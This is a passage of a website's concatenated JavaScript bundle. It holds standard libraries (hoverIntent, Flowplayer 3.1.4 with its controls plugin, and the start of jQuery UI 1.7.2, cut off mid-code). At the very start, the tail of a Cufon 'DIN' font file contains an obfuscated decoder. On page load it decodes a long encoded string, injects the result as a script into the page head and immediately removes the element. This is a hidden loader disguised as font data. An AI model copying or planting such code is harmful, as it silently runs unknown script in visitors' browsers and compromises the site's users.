c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-617-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("4&{5#JLGU7?c4Ope:JQY^&^?$aL5{J?c$aCYU7E3{T;dbBGf$9ko|&{,$9ko|&b=$9ko|&Ep$9ko|&EJEp=5|xZ={T=5|hy,{Q=5|hypLQ=5|hyx|T=5|hyfbp=5|hy,bT=5|hyf{p=5|hyJLfT.:-Zo{-C.:-Zo{h:T$9ko|&k5$9ko|&Tf$9ko|&zV$9ko|&t=$9ko|&TJ$9ko|&Tx$9ko|&{f$9ko|&TW$9ko|&ka$9ko|&^Y:5=5|hyx|p=5|hyxLT=5|hyx{T=5|xZBbT=5|hyxLQ=5|hy,LT=5|hyfLp{.:-Zob-E.:-Zob7E.:-ZobJE;$9ko|&bs$9ko|&Qp$9ko|&b2$9ko|&z=$9ko|&^5RZyOhzQ&9^C4]|L[XtE@-kT7$b{U#.:+RMWfx,pJ30_FNducmo=YBG5aVs2ne;?j)p=5|hyx{pom$9ko|&b5$9kY|hzB$9ko|&kB$9ko|&Ef$9ko|&t2b5=5|hyf{T=5|hz5|p=5|hyx{hT.:-Zo{7E.:-^o|hW.:-Zob-C{#Y:.:-Zo{h{.:-^o|7E.:-^o|hZs$9ko|&za$9kY|hZV$9kY|hZa$9ko|&^B|5=5|hyJbaW.:-ZobB{.:-^o|xC.:-^oL7{.:-ZobxQ.:-Zo{hE.:-ZobBL.:-^o|-y.:-^=|xC.:-^o|-p.:-Zob-,G$9kY|hZ2+p=5|hyJLQ=5|xZY{ftNt-p|$9ko|&|2-YQ.:-^o|hE.:-Zo{hC.:-Zo{-y3TQ=5|hyJ|5=5|xZo|k5b$9kY|hzs-3pC$9ko|&k=$9ko|&Ex$9ko|&z5#7C.:-Z=LBW.:-Z=L-L.:-^o|hL@tQ=5|hyJL5=5|hyf|Q=5|hyW[O0d|-u.:-Zo{-p.:-Zo{J{t$9kY|hQxE&_.^35^UT=5|hyp[O2.:-^o|Bp4[p=5|xZoLTL.:-Zo{hWO$9ko|&zBXf{.:-^o|-tx$9ko|&LW4T=5|hyfLQ?]$9ko|&^2$9ko|JEx$9ko|&kV$9ko|&bo$9ko|&Qx$9ko|&CW+Q=5|xZ=b-?.:-ZobBMV$9ko|&^sLp=5|hy,|Q=5|xZ=|T=5|hyW{p=5|hyW|Q=5|hCxLfG0ET=5|hyp{T=5|xZo|p:.:-^o|x{.:-ZobaL.:-ZobByNb-=c.fyp$9ko|&Lf.5=5|hyfLBC#$9kY|hyW$9ko|&QW$T=5|hyxL5=5|hyWb,.o#zL.:-ZobJL.:-Zo{JT.:-Zo{JQJ$pQU.9E.:-Zo{hLM+B5,:$Qa$Q=.:-Zo{x^f]3Lo#&pG4O^f4@=_X-Zd.h5f]3Zd#h5o]J=p#J:GUO=3X7^c{f23#9poU9|?+VGeU7b0bf2mUBGm$fM)[3:V:5oc4-;0XB_B#7Tf.JQc{&pc{5ocba?uR9LGb7:_#J:.]3Lu{7CYb72,U723$O2x#aG_CO?_]3Ep.Vt0#&?xb$E_#ascU&?B:&2W#7k_47{m.fMeU-=d[YdNU@p37aL#UT5:X$y#UT5?4@M_")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":533,"face":{"font-family":"DIN","font-weight":500,"font-stretch":"normal","units-per-em":"1000","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"800","descent":"-200","x-height":"6","bbox":"-19 -1000 975 211.616","underline-thickness":"70","underline-position":"-102","unicode-range":"U+0020-U+2122"}}));
;
﻿/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
* 
* @param  f  onMouseOver function || An object with configuration options
* @param  g  onMouseOut function  || Nothing (use configuration options object)
* @author    Brian Cherne <brian@cherne.net>
*/
(function($){$.fn.hoverIntent=function(f,g){var cfg={sensitivity:7,interval:100,timeout:0};cfg=$.extend(cfg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"?e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover"){pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery);;
/* 
 * flowplayer.js 3.1.4. The Flowplayer API
 * 
 * Copyright 2009 Flowplayer Oy
 * 
 * This file is part of Flowplayer.
 * 
 * Flowplayer is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 * 
 * Flowplayer is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 * 
 * You should have received a copy of the GNU General Public License
 * along with Flowplayer.  If not, see <http://www.gnu.org/licenses/>.
 * 
 * Date: 2009-02-25 21:24:29 +0000 (Wed, 25 Feb 2009)
 * Revision: 166 
 */
(function(){function g(o){console.log("$f.fireEvent",[].slice.call(o))}function k(q){if(!q||typeof q!="object"){return q}var o=new q.constructor();for(var p in q){if(q.hasOwnProperty(p)){o[p]=k(q[p])}}return o}function m(t,q){if(!t){return}var o,p=0,r=t.length;if(r===undefined){for(o in t){if(q.call(t[o],o,t[o])===false){break}}}else{for(var s=t[0];p<r&&q.call(s,p,s)!==false;s=t[++p]){}}return t}function c(o){return document.getElementById(o)}function i(q,p,o){if(typeof p!="object"){return q}if(q&&p){m(p,function(r,s){if(!o||typeof s!="function"){q[r]=s}})}return q}function n(s){var q=s.indexOf(".");if(q!=-1){var p=s.substring(0,q)||"*";var o=s.substring(q+1,s.length);var r=[];m(document.getElementsByTagName(p),function(){if(this.className&&this.className.indexOf(o)!=-1){r.push(this)}});return r}}function f(o){o=o||window.event;if(o.preventDefault){o.stopPropagation();o.preventDefault()}else{o.returnValue=false;o.cancelBubble=true}return false}function j(q,o,p){q[o]=q[o]||[];q[o].push(p)}function e(){return"_"+(""+Math.random()).substring(2,10)}var h=function(t,r,s){var q=this;var p={};var u={};q.index=r;if(typeof t=="string"){t={url:t}}i(this,t,true);m(("Begin*,Start,Pause*,Resume*,Seek*,Stop*,Finish*,LastSecond,Update,BufferFull,BufferEmpty,BufferStop").split(","),function(){var v="on"+this;if(v.indexOf("*")!=-1){v=v.substring(0,v.length-1);var w="onBefore"+v.substring(2);q[w]=function(x){j(u,w,x);return q}}q[v]=function(x){j(u,v,x);return q};if(r==-1){if(q[w]){s[w]=q[w]}if(q[v]){s[v]=q[v]}}});i(this,{onCuepoint:function(x,w){if(arguments.length==1){p.embedded=[null,x];return q}if(typeof x=="number"){x=[x]}var v=e();p[v]=[x,w];if(s.isLoaded()){s._api().fp_addCuepoints(x,r,v)}return q},update:function(w){i(q,w);if(s.isLoaded()){s._api().fp_updateClip(w,r)}var v=s.getConfig();var x=(r==-1)?v.clip:v.playlist[r];i(x,w,true)},_fireEvent:function(v,y,w,A){if(v=="onLoad"){m(p,function(B,C){if(C[0]){s._api().fp_addCuepoints(C[0],r,B)}});return false}A=A||q;if(v=="onCuepoint"){var z=p[y];if(z){return z[1].call(s,A,w)}}if(y&&"onBeforeBegin,onMetaData,onStart,onUpdate,onResume".indexOf(v)!=-1){i(A,y);if(y.metaData){if(!A.duration){A.duration=y.metaData.duration}else{A.fullDuration=y.metaData.duration}}}var x=true;m(u[v],function(){x=this.call(s,A,y,w)});return x}});if(t.onCuepoint){var o=t.onCuepoint;q.onCuepoint.apply(q,typeof o=="function"?[o]:o);delete t.onCuepoint}m(t,function(v,w){if(typeof w=="function"){j(u,v,w);delete t[v]}});if(r==-1){s.onCuepoint=this.onCuepoint}};var l=function(p,r,q,t){var s={};var o=this;var u=false;if(t){i(s,t)}m(r,function(v,w){if(typeof w=="function"){s[v]=w;delete r[v]}});i(this,{animate:function(y,z,x){if(!y){return o}if(typeof z=="function"){x=z;z=500}if(typeof y=="string"){var w=y;y={};y[w]=z;z=500}if(x){var v=e();s[v]=x}if(z===undefined){z=500}r=q._api().fp_animate(p,y,z,v);return o},css:function(w,x){if(x!==undefined){var v={};v[w]=x;w=v}r=q._api().fp_css(p,w);i(o,r);return o},show:function(){this.display="block";q._api().fp_showPlugin(p);return o},hide:function(){this.display="none";q._api().fp_hidePlugin(p);return o},toggle:function(){this.display=q._api().fp_togglePlugin(p);return o},fadeTo:function(y,x,w){if(typeof x=="function"){w=x;x=500}if(w){var v=e();s[v]=w}this.display=q._api().fp_fadeTo(p,y,x,v);this.opacity=y;return o},fadeIn:function(w,v){return o.fadeTo(1,w,v)},fadeOut:function(w,v){return o.fadeTo(0,w,v)},getName:function(){return p},getPlayer:function(){return q},_fireEvent:function(w,v,x){if(w=="onUpdate"){var y=q._api().fp_getPlugin(p);if(!y){return}i(o,y);delete o.methods;if(!u){m(y.methods,function(){var A=""+this;o[A]=function(){var B=[].slice.call(arguments);var C=q._api().fp_invoke(p,A,B);return C==="undefined"||C===undefined?o:C}});u=true}}var z=s[w];if(z){z.apply(o,v);if(w.substring(0,1)=="_"){delete s[w]}}}})};function b(o,t,z){var E=this,y=null,x,u,p=[],s={},B={},r,v,w,D,A,q;i(E,{id:function(){return r},isLoaded:function(){return(y!==null)},getParent:function(){return o},hide:function(F){if(F){o.style.height="0px"}if(y){y.style.height="0px"}return E},show:function(){o.style.height=q+"px";if(y){y.style.height=A+"px"}return E},isHidden:function(){return y&&parseInt(y.style.height,10)===0},load:function(F){if(!y&&E._fireEvent("onBeforeLoad")!==false){m(a,function(){this.unload()});x=o.innerHTML;if(x&&!flashembed.isSupported(t.version)){o.innerHTML=""}flashembed(o,t,{config:z});if(F){F.cached=true;j(B,"onLoad",F)}}return E},unload:function(){if(x.replace(/\s/g,"")!==""){if(E._fireEvent("onBeforeUnload")===false){return E}try{if(y){y.fp_close();E._fireEvent("onUnload")}}catch(F){}y=null;o.innerHTML=x}return E},getClip:function(F){if(F===undefined){F=D}return p[F]},getCommonClip:function(){return u},getPlaylist:function(){return p},getPlugin:function(F){var H=s[F];if(!H&&E.isLoaded()){var G=E._api().fp_getPlugin(F);if(G){H=new l(F,G,E);s[F]=H}}return H},getScreen:function(){return E.getPlugin("screen")},getControls:function(){return E.getPlugin("controls")},getConfig:function(F){return F?k(z):z},getFlashParams:function(){return t},loadPlugin:function(I,H,K,J){if(typeof K=="function"){J=K;K={}}var G=J?e():"_";E._api().fp_loadPlugin(I,H,K,G);var F={};F[G]=J;var L=new l(I,null,E,F);s[I]=L;return L},getState:function(){return y?y.fp_getState():-1},play:function(G,F){function H(){if(G!==undefined){E._api().fp_play(G,F)}else{E._api().fp_play()}}if(y){H()}else{E.load(function(){H()})}return E},getVersion:function(){var G="flowplayer.js 3.1.4";if(y){var F=y.fp_getVersion();F.push(G);return F}return G},_api:function(){if(!y){throw"Flowplayer "+E.id()+" not loaded when calling an API method"}return y},setClip:function(F){E.setPlaylist([F]);return E},getIndex:function(){return w}});m(("Click*,Load*,Unload*,Keypress*,Volume*,Mute*,Unmute*,PlaylistReplace,ClipAdd,Fullscreen*,FullscreenExit,Error,MouseOver,MouseOut").split(","),function(){var F="on"+this;if(F.indexOf("*")!=-1){F=F.substring(0,F.length-1);var G="onBefore"+F.substring(2);E[G]=function(H){j(B,G,H);return E}}E[F]=function(H){j(B,F,H);return E}});m(("pause,resume,mute,unmute,stop,toggle,seek,getStatus,getVolume,setVolume,getTime,isPaused,isPlaying,startBuffering,stopBuffering,isFullscreen,toggleFullscreen,reset,close,setPlaylist,addClip,playFeed").split(","),function(){var F=this;E[F]=function(H,G){if(!y){return E}var I=null;if(H!==undefined&&G!==undefined){I=y["fp_"+F](H,G)}else{I=(H===undefined)?y["fp_"+F]():y["fp_"+F](H)}return I==="undefined"||I===undefined?E:I}});E._fireEvent=function(O){if(typeof O=="string"){O=[O]}var P=O[0],M=O[1],K=O[2],J=O[3],I=0;if(z.debug){g(O)}if(!y&&P=="onLoad"&&M=="player"){y=y||c(v);A=y.clientHeight;m(p,function(){this._fireEvent("onLoad")});m(s,function(Q,R){R._fireEvent("onUpdate")});u._fireEvent("onLoad")}if(P=="onLoad"&&M!="player"){return}if(P=="onError"){if(typeof M=="string"||(typeof M=="number"&&typeof K=="number")){M=K;K=J}}if(P=="onContextMenu"){m(z.contextMenu[M],function(Q,R){R.call(E)});return}if(P=="onPluginEvent"){var F=M.name||M;var G=s[F];if(G){G._fireEvent("onUpdate",M);G._fireEvent(K,O.slice(3))}return}if(P=="onPlaylistReplace"){p=[];var L=0;m(M,function(){p.push(new h(this,L++,E))})}if(P=="onClipAdd"){if(M.isInStream){return}M=new h(M,K,E);p.splice(K,0,M);for(I=K+1;I<p.length;I++){p[I].index++}}var N=true;if(typeof M=="number"&&M<p.length){D=M;var H=p[M];if(H){N=H._fireEvent(P,K,J)}if(!H||N!==false){N=u._fireEvent(P,K,J,H)}}m(B[P],function(){N=this.call(E,M,K);if(this.cached){B[P].splice(I,1)}if(N===false){return false}I++});return N};function C(){if($f(o)){$f(o).getParent().innerHTML="";w=$f(o).getIndex();a[w]=E}else{a.push(E);w=a.length-1}q=parseInt(o.style.height,10)||o.clientHeight;if(typeof t=="string"){t={src:t}}r=o.id||"fp"+e();v=t.id||r+"_api";t.id=v;z.playerId=r;if(typeof z=="string"){z={clip:{url:z}}}if(typeof z.clip=="string"){z.clip={url:z.clip}}z.clip=z.clip||{};if(o.getAttribute("href",2)&&!z.clip.url){z.clip.url=o.getAttribute("href",2)}u=new h(z.clip,-1,E);z.playlist=z.playlist||[z.clip];var F=0;m(z.playlist,function(){var H=this;if(typeof H=="object"&&H.length){H={url:""+H}}m(z.clip,function(I,J){if(J!==undefined&&H[I]===undefined&&typeof J!="function"){H[I]=J}});z.playlist[F]=H;H=new h(H,F,E);p.push(H);F++});m(z,function(H,I){if(typeof I=="function"){if(u[H]){u[H](I)}else{j(B,H,I)}delete z[H]}});m(z.plugins,function(H,I){if(I){s[H]=new l(H,I,E)}});if(!z.plugins||z.plugins.controls===undefined){s.controls=new l("controls",null,E)}s.canvas=new l("canvas",null,E);t.bgcolor=t.bgcolor||"#000000";t.version=t.version||[9,0];t.expressInstall="http://www.flowplayer.org/swf/expressinstall.swf";function G(H){if(!E.isLoaded()&&E._fireEvent("onBeforeClick")!==false){E.load()}return f(H)}x=o.innerHTML;if(x.replace(/\s/g,"")!==""){if(o.addEventListener){o.addEventListener("click",G,false)}else{if(o.attachEvent){o.attachEvent("onclick",G)}}}else{if(o.addEventListener){o.addEventListener("click",f,false)}E.load()}}if(typeof o=="string"){flashembed.domReady(function(){var F=c(o);if(!F){throw"Flowplayer cannot access element: "+o}else{o=F;C()}})}else{C()}}var a=[];function d(o){this.length=o.length;this.each=function(p){m(o,p)};this.size=function(){return o.length}}window.flowplayer=window.$f=function(){var p=null;var o=arguments[0];if(!arguments.length){m(a,function(){if(this.isLoaded()){p=this;return false}});return p||a[0]}if(arguments.length==1){if(typeof o=="number"){return a[o]}else{if(o=="*"){return new d(a)}m(a,function(){if(this.id()==o.id||this.id()==o||this.getParent()==o){p=this;return false}});return p}}if(arguments.length>1){var r=arguments[1];var q=(arguments.length==3)?arguments[2]:{};if(typeof o=="string"){if(o.indexOf(".")!=-1){var t=[];m(n(o),function(){t.push(new b(this,k(r),k(q)))});return new d(t)}else{var s=c(o);return new b(s!==null?s:o,r,q)}}else{if(o){return new b(o,r,q)}}}return null};i(window.$f,{fireEvent:function(){var o=[].slice.call(arguments);var q=$f(o[0]);return q?q._fireEvent(o.slice(1)):null},addPlugin:function(o,p){b.prototype[o]=p;return $f},each:m,extend:i});if(typeof jQuery=="function"){jQuery.prototype.flowplayer=function(q,p){if(!arguments.length||typeof arguments[0]=="number"){var o=[];this.each(function(){var r=$f(this);if(r){o.push(r)}});return arguments.length?o[arguments[0]]:new d(o)}return this.each(function(){$f(this,k(q),p?k(p):{})})}}})();(function(){var e=typeof jQuery=="function";var i={width:"100%",height:"100%",allowfullscreen:true,allowscriptaccess:"always",quality:"high",version:null,onFail:null,expressInstall:null,w3c:false,cachebusting:false};if(e){jQuery.tools=jQuery.tools||{};jQuery.tools.flashembed={version:"1.0.4",conf:i}}function j(){if(c.done){return false}var l=document;if(l&&l.getElementsByTagName&&l.getElementById&&l.body){clearInterval(c.timer);c.timer=null;for(var k=0;k<c.ready.length;k++){c.ready[k].call()}c.ready=null;c.done=true}}var c=e?jQuery:function(k){if(c.done){return k()}if(c.timer){c.ready.push(k)}else{c.ready=[k];c.timer=setInterval(j,13)}};function f(l,k){if(k){for(key in k){if(k.hasOwnProperty(key)){l[key]=k[key]}}}return l}function g(k){switch(h(k)){case"string":k=k.replace(new RegExp('(["\\\\])',"g"),"\\$1");k=k.replace(/^\s?(\d+)%/,"$1pct");return'"'+k+'"';case"array":return"["+b(k,function(n){return g(n)}).join(",")+"]";case"function":return'"function()"';case"object":var l=[];for(var m in k){if(k.hasOwnProperty(m)){l.push('"'+m+'":'+g(k[m]))}}return"{"+l.join(",")+"}"}return String(k).replace(/\s/g," ").replace(/\'/g,'"')}function h(l){if(l===null||l===undefined){return false}var k=typeof l;return(k=="object"&&l.push)?"array":k}if(window.attachEvent){window.attachEvent("onbeforeunload",function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){}})}function b(k,n){var m=[];for(var l in k){if(k.hasOwnProperty(l)){m[l]=n(k[l])}}return m}function a(r,t){var q=f({},r);var s=document.all;var n='<object width="'+q.width+'" height="'+q.height+'"';if(s&&!q.id){q.id="_"+(""+Math.random()).substring(9)}if(q.id){n+=' id="'+q.id+'"'}if(q.cachebusting){q.src+=((q.src.indexOf("?")!=-1?"&":"?")+Math.random())}if(q.w3c||!s){n+=' data="'+q.src+'" type="application/x-shockwave-flash"'}else{n+=' classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"'}n+=">";if(q.w3c||s){n+='<param name="movie" value="'+q.src+'" />'}q.width=q.height=q.id=q.w3c=q.src=null;for(var l in q){if(q[l]!==null){n+='<param name="'+l+'" value="'+q[l]+'" />'}}var o="";if(t){for(var m in t){if(t[m]!==null){o+=m+"="+(typeof t[m]=="object"?g(t[m]):t[m])+"&"}}o=o.substring(0,o.length-1);n+='<param name="flashvars" value=\''+o+"' />"}n+="</object>";return n}function d(m,p,l){var k=flashembed.getVersion();f(this,{getContainer:function(){return m},getConf:function(){return p},getVersion:function(){return k},getFlashvars:function(){return l},getApi:function(){return m.firstChild},getHTML:function(){return a(p,l)}});var q=p.version;var r=p.expressInstall;var o=!q||flashembed.isSupported(q);if(o){p.onFail=p.version=p.expressInstall=null;m.innerHTML=a(p,l)}else{if(q&&r&&flashembed.isSupported([6,65])){f(p,{src:r});l={MMredirectURL:location.href,MMplayerType:"PlugIn",MMdoctitle:document.title};m.innerHTML=a(p,l)}else{if(m.innerHTML.replace(/\s/g,"")!==""){}else{m.innerHTML="<h2>Flash version "+q+" or greater is required</h2><h3>"+(k[0]>0?"Your version is "+k:"You have no flash plugin installed")+"</h3>"+(m.tagName=="A"?"<p>Click here to download latest version</p>":"<p>Download latest version from <a href='http://www.adobe.com/go/getflashplayer'>here</a></p>");if(m.tagName=="A"){m.onclick=function(){location.href="http://www.adobe.com/go/getflashplayer"}}}}}if(!o&&p.onFail){var n=p.onFail.call(this);if(typeof n=="string"){m.innerHTML=n}}if(document.all){window[p.id]=document.getElementById(p.id)}}window.flashembed=function(l,m,k){if(typeof l=="string"){var n=document.getElementById(l);if(n){l=n}else{c(function(){flashembed(l,m,k)});return}}if(!l){return}if(typeof m=="string"){m={src:m}}var o=f({},i);f(o,m);return new d(l,o,k)};f(window.flashembed,{getVersion:function(){var m=[0,0];if(navigator.plugins&&typeof navigator.plugins["Shockwave Flash"]=="object"){var l=navigator.plugins["Shockwave Flash"].description;if(typeof l!="undefined"){l=l.replace(/^.*\s+(\S+\s+\S+$)/,"$1");var n=parseInt(l.replace(/^(.*)\..*$/,"$1"),10);var r=/r/.test(l)?parseInt(l.replace(/^.*r(.*)$/,"$1"),10):0;m=[n,r]}}else{if(window.ActiveXObject){try{var p=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7")}catch(q){try{p=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");m=[6,0];p.AllowScriptAccess="always"}catch(k){if(m[0]==6){return m}}try{p=new ActiveXObject("ShockwaveFlash.ShockwaveFlash")}catch(o){}}if(typeof p=="object"){l=p.GetVariable("$version");if(typeof l!="undefined"){l=l.replace(/^\S+\s+(.*)$/,"$1").split(",");m=[parseInt(l[0],10),parseInt(l[2],10)]}}}}return m},isSupported:function(k){var m=flashembed.getVersion();var l=(m[0]>k[0])||(m[0]==k[0]&&m[1]>=k[1]);return l},domReady:c,asString:g,getHTML:a});if(e){jQuery.fn.flashembed=function(l,k){var m=null;this.each(function(){m=flashembed(this,l,k)});return l.api===false?this:m}}})();;
/**
 * flowplayer.controls.js 3.0.2. Flowplayer JavaScript plugin.
 * 
 * This file is part of Flowplayer, http://flowplayer.org
 *
 * Author: Tero Piirainen, <support@flowplayer.org>
 * Copyright (c) 2008 Flowplayer Ltd
 *
 * Dual licensed under MIT and GPL 2+ licenses
 * SEE: http://www.opensource.org/licenses
 * 
 * Version: 3.0.2 - Wed Apr 15 2009 08:36:11 GMT-0000 (GMT+00:00)
 */
$f.addPlugin("controls",function(wrap,options){function fixE(e){if(typeof e=='undefined'){e=window.event;}if(typeof e.layerX=='undefined'){e.layerX=e.offsetX;}if(typeof e.layerY=='undefined'){e.layerY=e.offsetY;}return e;}function w(e){return e.clientWidth;}function offset(e){return e.offsetLeft;}function Draggable(o,min,max,offset){var dragging=false;function foo(){}o.onDragStart=o.onDragStart||foo;o.onDragEnd=o.onDragEnd||foo;o.onDrag=o.onDrag||foo;function move(x){if(x>max){return false;}if(x<min){return false;}o.style.left=x+"px";return true;}function end(){document.onmousemove=null;document.onmouseup=null;o.onDragEnd(parseInt(o.style.left,10));dragging=false;}function drag(e){e=fixE(e);var x=e.clientX-offset;if(move(x)){dragging=true;o.onDrag(x);}return false;}o.onmousedown=function(e){e=fixE(e);o.onDragStart(parseInt(o.style.left,10));document.onmousemove=drag;document.onmouseup=end;return false;};this.dragTo=function(x){if(move(x)){o.onDragEnd(x);}};this.setMax=function(val){max=val;};this.isDragging=function(){return dragging;};return this;}function extend(to,from){if(from){for(key in from){if(key){to[key]=from[key];}}}}function byClass(name){var els=wrap.getElementsByTagName("*");var re=new RegExp("(^|\\s)"+name+"(\\s|$)");for(var i=0;i<els.length;i++){if(re.test(els[i].className)){return els[i];}}}function pad(val){val=parseInt(val,10);return val>=10?val:"0"+val;}function toTime(sec){var h=Math.floor(sec/3600);var min=Math.floor(sec/60);sec=sec-(min*60);if(h>=1){min-=h*60;return pad(h)+":"+pad(min)+":"+pad(sec);}return pad(min)+":"+pad(sec);}function getTime(time,duration){return"<span>"+toTime(time)+"</span> <strong>"+toTime(duration)+"</strong>";}var self=this;var opts={playHeadClass:'playhead',trackClass:'track',playClass:'play',pauseClass:'pause',bufferClass:'buffer',progressClass:'progress',timeClass:'time',muteClass:'mute',unmuteClass:'unmute',duration:0,template:'<a class="play">play</a>'+'<div class="track">'+'<div class="buffer"></div>'+'<div class="progress"></div>'+'<div class="playhead"></div>'+'</div>'+'<div class="time"></div>'+'<a class="mute">mute</a>'};extend(opts,options);if(typeof wrap=='string'){wrap=document.getElementById(wrap);}if(!wrap){return;}if(!wrap.innerHTML.replace(/\s/g,'')){wrap.innerHTML=opts.template;}var ball=byClass(opts.playHeadClass);var bufferBar=byClass(opts.bufferClass);var progressBar=byClass(opts.progressClass);var track=byClass(opts.trackClass);var time=byClass(opts.timeClass);var mute=byClass(opts.muteClass);time.innerHTML=getTime(0,opts.duration);var trackWidth=w(track);var ballWidth=w(ball);var head=new Draggable(ball,0,0,offset(wrap)+offset(track)+(ballWidth/2));track.onclick=function(e){e=fixE(e);if(e.target==ball){return false;}head.dragTo(e.layerX-ballWidth/2);};var play=byClass(opts.playClass);play.onclick=function(){if(self.isLoaded()){self.toggle();}else{self.play();}};mute.onclick=function(){if(self.getStatus().muted){self.unmute();}else{self.mute();}};var timer=null;function getMax(len,total){return parseInt(Math.min(len/total*trackWidth,trackWidth-ballWidth/2),10);}self.onStart(function(clip){var duration=clip.duration||0;clearInterval(timer);timer=setInterval(function(){var status=self.getStatus();if(status.time){time.innerHTML=getTime(status.time,clip.duration);}if(status.time===undefined){clearInterval(timer);return;}var x=getMax(status.bufferEnd,duration);bufferBar.style.width=x+"px";head.setMax(x);if(!self.isPaused()&&!head.isDragging()){x=getMax(status.time,duration);progressBar.style.width=x+"px";ball.style.left=(x-ballWidth/2)+"px";}},500);});self.onBegin(function(){play.className=opts.pauseClass;});self.onPause(function(){play.className=opts.playClass;});self.onResume(function(){play.className=opts.pauseClass;});self.onMute(function(){mute.className=opts.unmuteClass;});self.onUnmute(function(){mute.className=opts.muteClass;});self.onFinish(function(clip){clearInterval(timer);});self.onUnload(function(){time.innerHTML=getTime(0,opts.duration);});ball.onDragEnd=function(x){var to=parseInt(x/trackWidth*100,10)+"%";progressBar.style.width=x+"px";if(self.isLoaded()){self.seek(to);}};ball.onDrag=function(x){progressBar.style.width=x+"px";};return self;});;
/*
 * jQuery UI 1.7.2
 *
 * Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
 * Dual licensed under the MIT (MIT-LICENSE.txt)
 * and GPL (GPL-LICENSE.txt) licenses.
 *
 * http://docs.jquery.com/UI
 */
jQuery.ui||(function(c){var i=c.fn.remove,d=c.browser.mozilla&&(parseFloat(c.browser.version)<1.9);c.ui={version:"1.7.2",plugin:{add:function(k,l,n){var m=c.ui[k].prototype;for(var j in n){m.plugins[j]=m.plugins[j]||[];m.plugins[j].push([l,n[j]])}},call:function(j,l,k){var n=j.plugins[l];if(!n||!j.element[0].parentNode){return}for(var m=0;m<n.length;m++){if(j.options[n[m][0]]){n[m][1].apply(j.element,k)}}}},contains:function(k,j){return document.compareDocumentPosition?k.compareDocumentPosition(j)&16:k!==j&&k.contains(j)},hasScroll:function(m,k){if(c(m).css("overflow")=="hidden"){return false}var j=(k&&k=="left")?"scrollLeft":"scrollTop",l=false;if(m[j]>0){return true}m[j]=1;l=(m[j]>0);m[j]=0;return l},isOverAxis:function(k,j,l){return(k>j)&&(k<(j+l))},isOver:function(o,k,n,m,j,l){return c.ui.isOverAxis(o,n,j)&&c.ui.isOverAxis(k,m,l)},keyCode:{BACKSPACE:8,CAPS_LOCK:20,COMMA:188,CONTROL:17,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,INSERT:45,LEFT:37,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,NUMPAD_SUBTRACT:109,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SHIFT:16,SPACE:32,TAB:9,UP:38}};if(d){var f=c.attr,e=c.fn.removeAttr,h="http://www.w3.org/2005/07/aaa",a=/^aria-/,b=/^wairole:/;c.attr=function(k,j,l){var m=l!==undefined;return(j=="role"?(m?f.call(this,k,j,"wairole:"+l):(f.apply(this,arguments)||"").replace(b,"")):(a.test(j)?(m?k.setAttributeNS(h,j.replace(a,"aaa:"),l):f.call(this,k,j.replace(a,"aaa:"))):f.apply(this,arguments)))};c.fn.removeAttr=function(j){return(a.test(j)?this.each(function(){this.removeAttributeNS(h,j.replace(a,""))}):e.call(this,j))}}c.fn.extend({remove:function(){c("*",this).add(this).each(function(){c(this).triggerHandler("remove")});return i.apply(this,arguments)},enableSelection:function(){return this.attr("unselectable","off").css("MozUserSelect","").unbind("selectstart.ui")},disableSelection:function(){return this.attr("unselectable","on").css("MozUserSelect","none").bind("selectstart.ui",function(){return false})},scrollParent:function(){var 